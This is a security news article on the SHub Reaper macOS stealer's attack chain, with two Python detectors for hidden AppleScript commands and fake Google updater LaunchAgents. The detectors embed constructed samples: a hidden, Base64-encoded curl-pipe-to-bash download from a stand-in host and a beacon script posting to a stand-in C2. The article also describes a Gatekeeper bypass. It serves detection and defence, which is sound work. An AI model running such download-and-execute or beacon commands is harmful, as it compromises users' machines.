SHub Reaper macOS stealer spoofs Apple Google and Microsoft in a single attack chain

SHub Reaper macOS stealer uses a multi-stage attack chain spoofing Apple, Google, and Microsoft to bypass security and steal passwords.

May 18, 2026
3 min read
Technobezz


A new macOS infostealer called SHub Reaper spoofs Apple, Google, and Microsoft at different stages of a single attack chain, using a fake Apple security update to trick users into handing over passwords and installing a persistent backdoor.

SentinelOne researcher Phil Stokes documented the variant on May 18, describing it as a major evolution of the SHub Stealer family that has circulated through macOS-focused criminal campaigns for two years. What makes Reaper different: the infection chain changes its disguise at every stage. The attack starts with fake WeChat or Miro installer websites hosted on typo-squatted domains, including mlcrosoft[.]co[.]com. These pages fingerprint visitors before delivering the payload, collecting IP addresses, WebGL data, VPN indicators, and installed browser extensions. The scripts specifically look for password managers including 1Password, Bitwarden, and LastPass, plus cryptocurrency wallets such as MetaMask and Phantom.

Instead of the usual "ClickFix" trick that pushes victims into pasting commands into Terminal, Reaper uses the applescript:// URL scheme to launch macOS Script Editor with the malicious script pre-loaded. The shift sidesteps the mitigation Apple added in macOS Tahoe 26.4 for Terminal-based attack chains. The script is padded with ASCII art and fake installer text so that the dangerous command sits below the visible area of the Script Editor window. When a victim clicks "Run," the script displays a fake update referencing Apple's XProtectRemediator tool while silently decoding and executing a Base64-encoded curl command in the background. The malware checks for Russian input sources, and if the system appears to be in the CIS region, it sends a cis_blocked event to its C2 server and exits.
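The delivery and hiding tricks described above can be checked mechanically. The following is an added example, not code from SentinelOne or the malware: it extracts the script body from an applescript:// URL (the long-standing Script Editor form, with the script URL-encoded in the script query parameter), then scans the AppleScript for do shell script calls that are pushed below the visible window by padding, decode a Base64 blob inline, or run backgrounded so the dialog stays in front. The sample script, the example.invalid URL and the payload are constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample, not the real Reaper script: a banner at the top, a few
# hundred blank lines of padding, then the fake dialog and the hidden command.
HIDDEN_COMMAND = "curl -fsSL http://example.invalid/payload.sh | bash"
ENCODED = base64.b64encode(HIDDEN_COMMAND.encode()).decode()
SAMPLE_SCRIPT = "\n".join(
    ["-- =====================================",
     "--    Apple Security Update Installer",
     "-- ====================================="]
    + [""] * 300
    + ['display dialog "Applying XProtectRemediator update..." buttons {"Run"}',
       f'do shell script "echo {ENCODED} | base64 -d | sh &"']
)
# Script Editor's applescript:// form: the script travels in the 'script' parameter.
SAMPLE_URL = "applescript://com.apple.scripteditor?action=new&script=" + quote(SAMPLE_SCRIPT)

SHELL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)
DECODE_RE = re.compile(r"base64\s+(-d\b|-D\b|--decode)")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
FETCH_RE = re.compile(r"\b(curl|wget|nscurl|osascript)\b")


@dataclass
class Finding:
    line_no: int
    blank_lines_before: int
    command: str
    decoded: list[str] = field(default_factory=list)
    reasons: list[str] = field(default_factory=list)


def script_from_url(url: str) -> str:
    """Extract the script body from an applescript:// URL (empty string if none)."""
    parts = urlsplit(url)
    if parts.scheme != "applescript":
        return ""
    return parse_qs(parts.query).get("script", [""])[0]


def analyze_applescript(source: str, visible_lines: int = 40) -> list[Finding]:
    """Flag 'do shell script' calls that are hidden by padding, decode Base64
    inline, fetch remote content after decoding, or run in the background."""
    findings: list[Finding] = []
    lines = source.splitlines()
    for idx, line in enumerate(lines, start=1):
        m = SHELL_RE.search(line)
        if not m:
            continue
        cmd = m.group(1)
        blanks = sum(1 for prior in lines[: idx - 1] if not prior.strip())
        f = Finding(line_no=idx, blank_lines_before=blanks, command=cmd)
        if idx > visible_lines and blanks >= visible_lines:
            f.reasons.append(f"command at line {idx} sits below {blanks} blank lines of padding")
        if DECODE_RE.search(cmd):
            f.reasons.append("inline base64 decoding")
        for blob in B64_RE.findall(cmd):
            try:
                text = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not a valid blob, or binary payload; leave it
            f.decoded.append(text)
            if FETCH_RE.search(text):
                f.reasons.append(f"decoded payload fetches remote content: {text}")
        if cmd.rstrip().endswith("&"):
            f.reasons.append("command is backgrounded so the fake dialog stays in front")
        if f.reasons:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in analyze_applescript(script_from_url(SAMPLE_URL)):
        print(f"line {finding.line_no}: {finding.command}")
        for reason in finding.reasons:
            print("  -", reason)
```

The padding heuristic uses a 40-line default for what a Script Editor window shows; adjust it to the display you are triaging. The decoder only reports UTF-8 text, so a Base64 blob that unpacks to a binary is silently skipped and should be pulled out for separate analysis.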

Reaper targets credentials and data from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, plus desktop wallets including Exodus, Atomic, Ledger Live, Electrum, and Trezor Suite. It also steals macOS Keychain data, Telegram sessions, and developer configuration files. A new AMOS-style Filegrabber routine searches Desktop and Documents folders for files with business or financial value (docx, xlsx, json, wallet, rdp, and others under 2MB, plus PNG images under 6MB). The collection is capped at 150MB, and if the staged data exceeds 85MB, the malware splits it into 70MB ZIP chunks for sequential upload.

After exfiltration, Reaper tries to compromise cryptocurrency wallet applications directly. It terminates active wallet processes, downloads a modified app.asar file from the C2 server, and replaces the legitimate application core. To get the tampered app past Gatekeeper, the script clears quarantine attributes with xattr -cr and applies an ad hoc code signature. Because an ad hoc signature carries no Developer ID, a wallet app patched this way reports Signature=adhoc and no Team Identifier in the output of codesign -dv --verbose=4, which is a quick check for anyone who suspects tampering.

The biggest change from earlier SHub builds is persistence. Reaper creates a directory structure mimicking Google Software Update at ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ and places a Base64-decoded bash script named GoogleUpdate inside. A LaunchAgent property list named com.google.keystone.agent.plist runs the script every 60 seconds. The beacon sends system details to the C2's /api/bot/heartbeat endpoint. If the server returns a "code" payload, the script decodes it, writes it to a hidden file, executes it with the current user's privileges, and deletes it. This gives the operators a persistent backdoor for remote code execution. Note that a genuine Google Keystone installation also registers a LaunchAgent under that same label, so the plist name by itself is not an indicator; the telltales are the bash script under Application Support/Google/GoogleUpdate.app and the 60-second interval.
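The persistence described above is the part a responder can hunt for. The following is an added triage script, not SentinelOne's code or the malware: it parses a LaunchAgent plist and lists the reasons it resembles Reaper's fake updater, namely a Keystone label whose program is outside the genuine Keystone install directory (~/Library/Google/GoogleSoftwareUpdate), a program under the GoogleUpdate.app path from the write-up, a short StartInterval, a shell interpreter in ProgramArguments, and a script body that carries the /api/bot/heartbeat string. The sample plist, the /Users/victim home, the c2.example.invalid host and the beacon script body are constructed; only the path, label, interval and endpoint name come from the article. The ProgramArguments layout is an assumption, since the write-up does not quote the plist.

```python
import os
import plistlib
from typing import Callable, Optional

HOME = "/Users/victim"  # constructed home directory for the sample
# Path Reaper uses for its fake updater (from the write-up) and the directory a
# genuine Google Keystone install lives in, both relative to the user's home.
REAPER_DIR = "Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS"
KEYSTONE_DIR = "Library/Google/GoogleSoftwareUpdate"
SHELLS = ("/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/env")
SCRIPT_MARKERS = (b"/api/bot/heartbeat", b"base64 -d", b"base64 --decode")

# Constructed stand-in for the decoded GoogleUpdate beacon: the endpoint name is
# from the write-up, the rest of the script body is assumed.
SAMPLE_BEACON = b"""#!/bin/bash
C2="https://c2.example.invalid"
RESP=$(curl -s -X POST "$C2/api/bot/heartbeat" -d "host=$(hostname)&user=$(whoami)")
"""
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/bin/bash", f"{HOME}/{REAPER_DIR}/GoogleUpdate"],
    "StartInterval": 60,
    "RunAtLoad": True,
})
SAMPLE_FS = {f"{HOME}/{REAPER_DIR}/GoogleUpdate": SAMPLE_BEACON}
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.backup-agent",
    "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/backup-helper", "--quiet"],
    "StartInterval": 3600,
})


def _target_of(agent: dict) -> tuple[Optional[str], Optional[str]]:
    """Return (interpreter, program): the file launchd really executes.
    '/bin/bash /path/script' means the script, not bash, is what to inspect."""
    if agent.get("Program"):
        return None, agent["Program"]
    args = agent.get("ProgramArguments") or []
    if not args:
        return None, None
    if args[0] in SHELLS and len(args) > 1:
        return args[0], args[-1]
    return None, args[0]


def _read_head(path: str) -> Optional[bytes]:
    try:
        with open(path, "rb") as fh:
            return fh.read(4096)
    except OSError:
        return None


def triage_launch_agent(plist_bytes: bytes, home: str,
                        read_file: Callable[[str], Optional[bytes]] = _read_head) -> list[str]:
    """Reasons a LaunchAgent resembles Reaper's fake Google updater.
    An empty list means no indicator matched, not that the agent is clean."""
    agent = plistlib.loads(plist_bytes)
    label = agent.get("Label", "")
    interpreter, program = _target_of(agent)
    reasons: list[str] = []
    if program is None:
        return ["no Program or ProgramArguments"]
    if label.startswith("com.google.keystone") and not program.startswith(os.path.join(home, KEYSTONE_DIR)):
        reasons.append(f"Keystone label but program outside {KEYSTONE_DIR}: {program}")
    if program.startswith(os.path.join(home, REAPER_DIR)):
        reasons.append("program lives in Reaper's fake GoogleUpdate.app bundle")
    interval = agent.get("StartInterval")
    if isinstance(interval, int) and interval <= 120:
        reasons.append(f"StartInterval {interval}s is beacon-like for an updater")
    if interpreter:
        reasons.append(f"runs a script through {interpreter} instead of a Mach-O binary")
    head = read_file(program)
    if head:
        if head.startswith(b"#!"):
            reasons.append("target is a shell script")
        for marker in SCRIPT_MARKERS:
            if marker in head:
                reasons.append(f"script contains {marker.decode()}")
    return reasons


def scan_user_agents(home: str = os.path.expanduser("~")) -> dict[str, list[str]]:
    """Run the triage over every plist in ~/Library/LaunchAgents on the live system."""
    agents_dir = os.path.join(home, "Library", "LaunchAgents")
    hits: dict[str, list[str]] = {}
    if not os.path.isdir(agents_dir):
        return hits
    for name in sorted(os.listdir(agents_dir)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(agents_dir, name)
        try:
            with open(path, "rb") as fh:
                reasons = triage_launch_agent(fh.read(), home)
        except Exception as exc:  # a plist that will not parse is itself worth a look
            reasons = [f"could not parse: {exc}"]
        if reasons:
            hits[path] = reasons
    return hits


if __name__ == "__main__":
    for reason in triage_launch_agent(SAMPLE_PLIST, HOME, SAMPLE_FS.get):
        print("-", reason)
```

On a real machine call scan_user_agents() and review every hit by hand; the Keystone path check will also flag a user who deliberately relocated Chrome's updater, so treat the reasons as leads rather than a verdict. Agents in /Library/LaunchAgents and /Library/LaunchDaemons are not covered here because the write-up places Reaper's persistence in the user's own LaunchAgents folder.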

"Alongside an AMOS-style Filegrabber and chunked uploads, the variant also installs a persistent backdoor, giving the operators more ways to steal data or pivot to other malicious installs after the initial compromise," Stokes said. The malware layers trusted brands at each stage: a fake WeChat installer, delivery from a typo-squatted Microsoft domain, execution disguised as an Apple security update, and persistence hidden inside a fake Google directory. Mac users should avoid running scripts from untrusted sites, ignore unsolicited "security update" prompts, and verify URLs before downloading software.
